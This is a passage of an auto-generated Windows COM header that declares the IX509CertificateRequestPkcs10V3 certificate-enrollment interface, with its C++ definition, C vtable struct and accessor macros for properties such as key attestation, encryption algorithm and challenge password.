#define IX509CertificateRequestPkcs10V2_InitializeFromTemplate(This,context,pPolicyServer,pTemplate)	\
    ( (This)->lpVtbl -> InitializeFromTemplate(This,context,pPolicyServer,pTemplate) ) 

#define IX509CertificateRequestPkcs10V2_InitializeFromPrivateKeyTemplate(This,Context,pPrivateKey,pPolicyServer,pTemplate)	\
    ( (This)->lpVtbl -> InitializeFromPrivateKeyTemplate(This,Context,pPrivateKey,pPolicyServer,pTemplate) ) 

#define IX509CertificateRequestPkcs10V2_InitializeFromPublicKeyTemplate(This,Context,pPublicKey,pPolicyServer,pTemplate)	\
    ( (This)->lpVtbl -> InitializeFromPublicKeyTemplate(This,Context,pPublicKey,pPolicyServer,pTemplate) ) 

#define IX509CertificateRequestPkcs10V2_get_PolicyServer(This,ppPolicyServer)	\
    ( (This)->lpVtbl -> get_PolicyServer(This,ppPolicyServer) ) 

#define IX509CertificateRequestPkcs10V2_get_Template(This,ppTemplate)	\
    ( (This)->lpVtbl -> get_Template(This,ppTemplate) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509CertificateRequestPkcs10V2_INTERFACE_DEFINED__ */


#ifndef __IX509CertificateRequestPkcs10V3_INTERFACE_DEFINED__
#define __IX509CertificateRequestPkcs10V3_INTERFACE_DEFINED__

/* interface IX509CertificateRequestPkcs10V3 */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509CertificateRequestPkcs10V3;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("54EA9942-3D66-4530-B76E-7C9170D3EC52")
    IX509CertificateRequestPkcs10V3 : public IX509CertificateRequestPkcs10V2
    {
    public:
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_AttestPrivateKey( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_AttestPrivateKey( 
            /* [in] */ VARIANT_BOOL Value) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_AttestationEncryptionCertificate( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_AttestationEncryptionCertificate( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_EncryptionAlgorithm( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_EncryptionAlgorithm( 
            /* [in] */ __RPC__in_opt IObjectId *pValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_EncryptionStrength( 
            /* [retval][out] */ __RPC__out LONG *pValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_EncryptionStrength( 
            /* [in] */ LONG Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ChallengePassword( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_ChallengePassword( 
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_NameValuePairs( 
            /* [retval][out] */ __RPC__deref_out_opt IX509NameValuePairs **ppValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509CertificateRequestPkcs10V3Vtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509CertificateRequestPkcs10V3 * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [in] */ X509CertificateEnrollmentContext Context);
        
        HRESULT ( STDMETHODCALLTYPE *Encode )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This);
        
        HRESULT ( STDMETHODCALLTYPE *ResetForEncode )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetInnerRequest )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [in] */ InnerRequestLevel Level,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateRequest **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Type )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [retval][out] */ __RPC__out X509RequestType *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EnrollmentContext )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [retval][out] */ __RPC__out X509CertificateEnrollmentContext *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Silent )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Silent )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ParentWindow )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ParentWindow )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [in] */ LONG Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_UIContextMessage )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_UIContextMessage )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SuppressDefaults )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_SuppressDefaults )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RenewalCertificate )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_RenewalCertificate )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ClientId )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [retval][out] */ __RPC__out RequestClientInfoClientId *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_ClientId )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [in] */ RequestClientInfoClientId Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CspInformations )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [retval][out] */ __RPC__deref_out_opt ICspInformations **ppValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_CspInformations )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [in] */ __RPC__in_opt ICspInformations *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_HashAlgorithm )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_HashAlgorithm )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [in] */ __RPC__in_opt IObjectId *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_AlternateSignatureAlgorithm )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_AlternateSignatureAlgorithm )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromTemplateName )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *InitializeFromPrivateKey )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in_opt IX509PrivateKey *pPrivateKey,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromPublicKey )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in_opt IX509PublicKey *pPublicKey,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromCertificate )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in BSTR strCertificate,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [defaultvalue][in] */ X509RequestInheritOptions InheritOptions);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [in] */ __RPC__in BSTR strEncodedData,
            /* [defaultvalue][in] */ EncodingType Encoding);
        
        HRESULT ( STDMETHODCALLTYPE *CheckSignature )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [defaultvalue][in] */ Pkcs10AllowedSignatureTypes AllowedSignatureTypes);
        
        HRESULT ( STDMETHODCALLTYPE *IsSmartCard )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_TemplateObjectId )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PublicKey )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509PublicKey **ppValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_PrivateKey )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509PrivateKey **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_NullSigned )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ReuseKey )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_OldCertificate )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Subject )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX500DistinguishedName **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_Subject )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [in] */ __RPC__in_opt IX500DistinguishedName *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CspStatuses )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatuses **ppValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_SmimeCapabilities )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_SmimeCapabilities )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SignatureInformation )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509SignatureInformation **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_KeyContainerNamePrefix )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_KeyContainerNamePrefix )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CryptAttributes )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [retval][out] */ __RPC__deref_out_opt ICryptAttributes **ppValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_X509Extensions )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509Extensions **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CriticalExtensions )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SuppressOids )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawDataToBeSigned )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Signature )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetCspStatuses )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [in] */ X509KeySpec KeySpec,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatuses **ppCspStatuses);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromTemplate )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [in] */ X509CertificateEnrollmentContext context,
            /* [in] */ __RPC__in_opt IX509EnrollmentPolicyServer *pPolicyServer,
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pTemplate);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromPrivateKeyTemplate )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in_opt IX509PrivateKey *pPrivateKey,
            /* [in] */ __RPC__in_opt IX509EnrollmentPolicyServer *pPolicyServer,
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pTemplate);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromPublicKeyTemplate )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in_opt IX509PublicKey *pPublicKey,
            /* [in] */ __RPC__in_opt IX509EnrollmentPolicyServer *pPolicyServer,
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pTemplate);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PolicyServer )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509EnrollmentPolicyServer **ppPolicyServer);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Template )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateTemplate **ppTemplate);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_AttestPrivateKey )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_AttestPrivateKey )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_AttestationEncryptionCertificate )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_AttestationEncryptionCertificate )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_EncryptionAlgorithm )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_EncryptionAlgorithm )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [in] */ __RPC__in_opt IObjectId *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_EncryptionStrength )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_EncryptionStrength )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [in] */ LONG Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ChallengePassword )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ChallengePassword )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_NameValuePairs )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509NameValuePairs **ppValue);
        
        END_INTERFACE
    } IX509CertificateRequestPkcs10V3Vtbl;

    interface IX509CertificateRequestPkcs10V3
    {
        CONST_VTBL struct IX509CertificateRequestPkcs10V3Vtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509CertificateRequestPkcs10V3_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509CertificateRequestPkcs10V3_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509CertificateRequestPkcs10V3_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509CertificateRequestPkcs10V3_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509CertificateRequestPkcs10V3_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509CertificateRequestPkcs10V3_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509CertificateRequestPkcs10V3_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509CertificateRequestPkcs10V3_Initialize(This,Context)	\
    ( (This)->lpVtbl -> Initialize(This,Context) ) 

#define IX509CertificateRequestPkcs10V3_Encode(This)	\
    ( (This)->lpVtbl -> Encode(This) ) 

#define IX509CertificateRequestPkcs10V3_ResetForEncode(This)	\
    ( (This)->lpVtbl -> ResetForEncode(This) ) 

#define IX509CertificateRequestPkcs10V3_GetInnerRequest(This,Level,ppValue)	\
    ( (This)->lpVtbl -> GetInnerRequest(This,Level,ppValue) ) 

#define IX509CertificateRequestPkcs10V3_get_Type(This,pValue)	\
    ( (This)->lpVtbl -> get_Type(This,pValue) ) 

#define IX509CertificateRequestPkcs10V3_get_EnrollmentContext(This,pValue)	\
    ( (This)->lpVtbl -> get_EnrollmentContext(This,pValue) ) 

#define IX509CertificateRequestPkcs10V3_get_Silent(This,pValue)	\
    ( (This)->lpVtbl -> get_Silent(This,pValue) ) 

#define IX509CertificateRequestPkcs10V3_put_Silent(This,Value)	\
    ( (This)->lpVtbl -> put_Silent(This,Value) ) 

#define IX509CertificateRequestPkcs10V3_get_ParentWindow(This,pValue)	\
    ( (This)->lpVtbl -> get_ParentWindow(This,pValue) ) 

#define IX509CertificateRequestPkcs10V3_put_ParentWindow(This,Value)	\
    ( (This)->lpVtbl -> put_ParentWindow(This,Value) ) 

#define IX509CertificateRequestPkcs10V3_get_UIContextMessage(This,pValue)	\
    ( (This)->lpVtbl -> get_UIContextMessage(This,pValue) ) 

#define IX509CertificateRequestPkcs10V3_put_UIContextMessage(This,Value)	\
    ( (This)->lpVtbl -> put_UIContextMessage(This,Value) ) 

#define IX509CertificateRequestPkcs10V3_get_SuppressDefaults(This,pValue)	\
    ( (This)->lpVtbl -> get_SuppressDefaults(This,pValue) ) 

#define IX509CertificateRequestPkcs10V3_put_SuppressDefaults(This,Value)	\
    ( (This)->lpVtbl -> put_SuppressDefaults(This,Value) ) 

#define IX509CertificateRequestPkcs10V3_get_RenewalCertificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RenewalCertificate(This,Encoding,pValue) ) 

#define IX509CertificateRequestPkcs10V3_put_RenewalCertificate(This,Encoding,Value)	\
    ( (This)->lpVtbl -> put_RenewalCertificate(This,Encoding,Value) ) 

#define IX509CertificateRequestPkcs10V3_get_ClientId(This,pValue)	\
    ( (This)->lpVtbl -> get_ClientId(This,pValue) ) 

#define IX509CertificateRequestPkcs10V3_put_ClientId(This,Value)	\
    ( (This)->lpVtbl -> put_ClientId(This,Value) ) 

#define IX509CertificateRequestPkcs10V3_get_CspInformations(This,ppValue)	\
    ( (This)->lpVtbl -> get_CspInformations(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V3_put_CspInformations(This,pValue)	\
    ( (This)->lpVtbl -> put_CspInformations(This,pValue) ) 

#define IX509CertificateRequestPkcs10V3_get_HashAlgorithm(This,ppValue)	\
    ( (This)->lpVtbl -> get_HashAlgorithm(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V3_put_HashAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> put_HashAlgorithm(This,pValue) ) 

#define IX509CertificateRequestPkcs10V3_get_AlternateSignatureAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> get_AlternateSignatureAlgorithm(This,pValue) ) 

#define IX509CertificateRequestPkcs10V3_put_AlternateSignatureAlgorithm(This,Value)	\
    ( (This)->lpVtbl -> put_AlternateSignatureAlgorithm(This,Value) ) 

#define IX509CertificateRequestPkcs10V3_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 


#define IX509CertificateRequestPkcs10V3_InitializeFromTemplateName(This,Context,strTemplateName)	\
    ( (This)->lpVtbl -> InitializeFromTemplateName(This,Context,strTemplateName) ) 

#define IX509CertificateRequestPkcs10V3_InitializeFromPrivateKey(This,Context,pPrivateKey,strTemplateName)	\
    ( (This)->lpVtbl -> InitializeFromPrivateKey(This,Context,pPrivateKey,strTemplateName) ) 

#define IX509CertificateRequestPkcs10V3_InitializeFromPublicKey(This,Context,pPublicKey,strTemplateName)	\
    ( (This)->lpVtbl -> InitializeFromPublicKey(This,Context,pPublicKey,strTemplateName) ) 

#define IX509CertificateRequestPkcs10V3_InitializeFromCertificate(This,Context,strCertificate,Encoding,InheritOptions)	\
    ( (This)->lpVtbl -> InitializeFromCertificate(This,Context,strCertificate,Encoding,InheritOptions) ) 

#define IX509CertificateRequestPkcs10V3_InitializeDecode(This,strEncodedData,Encoding)	\
    ( (This)->lpVtbl -> InitializeDecode(This,strEncodedData,Encoding) ) 

#define IX509CertificateRequestPkcs10V3_CheckSignature(This,AllowedSignatureTypes)	\
    ( (This)->lpVtbl -> CheckSignature(This,AllowedSignatureTypes) ) 

#define IX509CertificateRequestPkcs10V3_IsSmartCard(This,pValue)	\
    ( (This)->lpVtbl -> IsSmartCard(This,pValue) ) 

#define IX509CertificateRequestPkcs10V3_get_TemplateObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_TemplateObjectId(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V3_get_PublicKey(This,ppValue)	\
    ( (This)->lpVtbl -> get_PublicKey(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V3_get_PrivateKey(This,ppValue)	\
    ( (This)->lpVtbl -> get_PrivateKey(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V3_get_NullSigned(This,pValue)	\
    ( (This)->lpVtbl -> get_NullSigned(This,pValue) ) 

#define IX509CertificateRequestPkcs10V3_get_ReuseKey(This,pValue)	\
    ( (This)->lpVtbl -> get_ReuseKey(This,pValue) ) 

#define IX509CertificateRequestPkcs10V3_get_OldCertificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_OldCertificate(This,Encoding,pValue) ) 

#define IX509CertificateRequestPkcs10V3_get_Subject(This,ppValue)	\
    ( (This)->lpVtbl -> get_Subject(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V3_put_Subject(This,pValue)	\
    ( (This)->lpVtbl -> put_Subject(This,pValue) ) 

#define IX509CertificateRequestPkcs10V3_get_CspStatuses(This,ppValue)	\
    ( (This)->lpVtbl -> get_CspStatuses(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V3_get_SmimeCapabilities(This,pValue)	\
    ( (This)->lpVtbl -> get_SmimeCapabilities(This,pValue) ) 

#define IX509CertificateRequestPkcs10V3_put_SmimeCapabilities(This,Value)	\
    ( (This)->lpVtbl -> put_SmimeCapabilities(This,Value) ) 

#define IX509CertificateRequestPkcs10V3_get_SignatureInformation(This,ppValue)	\
    ( (This)->lpVtbl -> get_SignatureInformation(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V3_get_KeyContainerNamePrefix(This,pValue)	\
    ( (This)->lpVtbl -> get_KeyContainerNamePrefix(This,pValue) ) 

